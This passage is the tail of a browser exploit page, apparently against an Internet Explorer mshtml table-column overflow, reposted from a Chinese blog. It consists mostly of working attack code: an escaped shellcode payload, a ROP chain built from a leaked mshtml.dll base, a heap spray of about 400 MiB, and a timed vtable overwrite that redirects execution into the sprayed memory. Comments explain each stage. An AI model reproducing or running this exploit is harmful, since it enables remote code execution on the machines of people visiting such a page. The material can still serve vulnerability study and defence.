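            var code = unescape("%u40b0%u414b%u1d24%ub4a8%u7799%ube37%ua947%ud41a%u353f%ueb30%ud133%u2ae1%u31e0%ue2d3%u1514%ufd13%u3497%u7a7b%ufc39%u92ba%u9390%u0a4e%ubbf5%u8db2%ue385%uf823%ud53a%u0448%u750d%ud632%u707c%u4642%u7e78%ub12c%u2f98%u1c3c%u727e%u3b7b%u4fe0%ue38c%u4f76%u81b0%u2de2%u35ba%u86bb%u67f8%u8d0c%u9190%u7574%u7f71%u7d3c%u9f15%ub347%ud50b%u784e%u4970%u1b37%uc1ff%uc6fe%uc0c7%ub6d4%u9246%ub4b1%uf588%ua91d%u7c4b%u2548%u7a99%u9b3d%u01b7%u34eb%u1cb5%u38a8%ub8fc%ud609%ube4a%u9714%ue121%ub904%u42b2%u7796%u6924%u80f9%u0dfd%u412c%u2f05%u273f%ubf40%u9893%u7343%u6679%u77a8%ub63f%u7472%u707b%u843d%uebd2%uf630%ubfd5%u71b2%u757a%u1848%u0cf5%u96b7%uf889%u764a%u9b2d%u92b0%u66be%u7d97%ub425%u9114%u4904%uba34%u421c%ue308%uf902%u4140%u4773%u0d27%u93b5%u2299%u1dd4%u7c4f%u2867%u98fc%u2c24%ue212%ufd03%u78a9%u3505%u8390%u2fe0%u4337%u154b%u468d%u79b9%u297f%ubbd6%u197e%u4ee1%u9fb8%ub1b3%u4a3c%u7a7d%u7679%u4670%u2091%u74e1%ub043%u4e71%ub590%u75b7%u983c%u4bb3%ud687%uf86b%u9b40%u117f%ud1f7%u7bf9%u152f%u3427%u1d92%u3d97%u2d49%u720d%u014f%u7ce0%u3105%u10eb%u35f5%ub4b6%u1c2c%u93b2%u4704%ud52b%ubbb1%ue389%u4137%u7e78%u733f%u7742%u2925%ufcd0%u6624%u8dba%u67b9%u1a96%ua8fd%ua9be%ud40b%u4899%u9f14%u87bf%ue2f7%ub80c%u903d%u14b0%u25bb%u7d96%u1a7f%u79f5%uf809%u347c%u7b91%u4e47%ueb81%ue122%ud41b%u7074%ub21d%u2d72%u928d%ub3b1%ua905%u71b4%u4b0c%u9343%u0d76%u989f%u84b5%ub7d5%u4666%ube40%ub8bf%u201c%u48e2%u4a73%u6b2c%u2afc%u04e0%u4941%u3777%u10ba%u7ed6%u332f%ub9fd%u7a9b%u7875%u2415%u1299%uf9d2%u3f97%ub63c%u3567%u27a8%ue386%u7742%u4f73%ue380%ua93c%u757c%uf62b%ud0c0%u27e0%u214b%ue1d3%ub93f%u157d%u8c14%ue2c1%u9904%u7498%u7071%u6637%ueb28%u4e1c%u7fb6%u357b%u3297%u25d4%uf569%u9105%u4047%u0224%u78d6%u7941%uba3d%u49b1%u7276%u1d2f%u85bf%u67fc%u7e92%u4a2c%u7ab4%u1348%u93d5%u8d9b%u03bb%u74fd%u0879%u43e1%ue083%u1873%u46e3%u2372%ub2f8%u88b0%ub8f9%u969f%u75b5%u770c%u7b42%ub72d%u7aa8%ue219%ueb38%ub334%u90be%u4f7e%u0d7f%ub3b6%u3076%ubff5%u479f%u7167%ud40a%u3b7c%u66fc%u41b7%u9615%u3dfd%u3505%ub825%u1c7d%ub54a%u3940%u37d6%u3f92%u971d%u1478%u8d49%ua8b2%u3493%u2c3c%u902f%ud54f%u04a9%u1198%u91f8%ub99b%u9943%ubbb1%u0d70%u4824%u4b0c%ube4e%ub02d%uf93a%u27ba%ub446%udb42%ud9d1%u2474%u5af4%uc929%u49b1%u8cbe%uc04a%u31a0%u1972%uc283%u0304%u1572%ubf6e%u483c%u40e7%u89bd%uc997%ub858%uae85%ue929%ua419%u027c%ue8d2%u9194%u2496%u129a%u131c%ua395%u9b91%u6779%u67b0%ub480%u5912%uc94b%u9e53%u22b6%u7701%u91bc%ufcb5%u2980%ud2b4%u128e%u57ce%ue650%u5964%u5781%u11f3%ud339%u825b%u3038%ufeb8%u3d73%u740a%u9782%u7543%ud7b4%u480f%uda78%u8c4e%u05bf%ue625%ub8c3%u3d3d%u66b9%ua0c8%uec19%u016a%u219b%uc2ec%u8e97%u8c7b%u11bb%ua6a8%u9ac0%u694f%ud841%uad6b%uba09%uf412%u6df7%ue62b%ud150%u6c89%u0672%u2eab%ueb1b%ud081%u63db%ua392%u2ce9%u2c08%ua442%uab96%u9fa5%u236e%u2058%u6d8e%u749f%u05de%uf536%ud5b5%u20b7%u8619%u9b17%u76d9%u4bd8%u9cb1%ub4d7%u9ea1%udd3d%u644b%u22d6%u6723%ucb43%u6831%u579a%u8ebc%u77f6%u19e8%ue16f%ud2b1%uee0e%u9f6c%u6411%u5f82%u8ddf%u73ef%u7d88%u2eba%u811f%u4411%u17a0%ucf9d%u8ff7%u369f%u103f%u1d60%u994b%udef4%ue624%udf18%ub0b4%udf72%u64dc%u8c26%u6af9%ua0f3%uff51%u90fb%ua806%u1e93%u9e70%ue03c%u1e57%u3701%ua49e%u3d73%u64f2");

            // mshtmlbase is the global filled in by over_trigger().  If the leak
            // failed it is still "" and `"" + Number(...)` does string concatenation
            // instead of address arithmetic, so the chain below is then garbage.
            var rop_str = heapobj.tab2uni(heapobj, heapobj.rop_chain(mshtmlbase));
            var shellcode = rop_str + code;

            // Grow to >= 100000 UTF-16 units, then assemble 16 pieces of 32768
            // units (64 KiB) each: 15 full pieces plus one short by 19 units
            // (38 bytes), presumably so that the string together with its
            // BSTR/heap header occupies exactly 1 MiB - TODO confirm.
            while (shellcode.length < 100000)
                shellcode = shellcode + shellcode;
            var onemeg = shellcode.substr(0, 64*1024/2);
            var i;
            for (i=0; i<14; i++) {
                onemeg += shellcode.substr(0, 64*1024/2);
            }
            onemeg += shellcode.substr(0, (64*1024/2)-(38/2));

            // 400 copies (~400 MiB) kept alive in `spray`; substr() of the whole
            // length forces a distinct allocation per copy.
            var spray = new Array();
            for (i=0; i<400; i++) {
                spray[i] = onemeg.substr(0, onemeg.length);
            }
        }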
    
        // Stage 3: re-trigger the table-column overflow on col #132.  The copied
        // value is width*100 (see the "copydata=width*100" annotation in the
        // CalculateMinMax listing above): 1178993 * 100 == 117899300 == 0x07070024,
        // the dword that ends up over the neighbouring object's vtable pointer,
        // pointing it into the heap-sprayed region.  Assignment order (width,
        // then span) is kept exactly as in the original.
        function smash_vtable(){
            var target = document.getElementById("132");
            var overwriteValue = "1178993";     // -> 0x07070024 after the *100 in layout
            var overwriteCount = "44";          // span: how many 0x1C-byte entries get written
            target.width = overwriteValue;
            target.span = overwriteCount;
        }
    
        // Stage sequencing.  mshtmlbase is filled in by over_trigger(); it stays ""
        // if no overflowed string is found, and heap_spray() still runs with it.
        var mshtmlbase = "";
        // 1 ms: read the BSTR whose length was presumably corrupted by the
        // `obj_col.span = 19` write above and derive the mshtml.dll base.
        setTimeout("over_trigger();",1);    
        // 400 ms: build ROP chain + payload from mshtmlbase and spray ~400 MiB.
        setTimeout("heap_spray();",400);
        // 700 ms: second overflow writes 0x07070024 over a vtable pointer.
        setTimeout("smash_vtable();",700);
    
            </script>
            </body>
            </html>
  • 原文地址:https://www.cnblogs.com/snip3r/p/9677546.html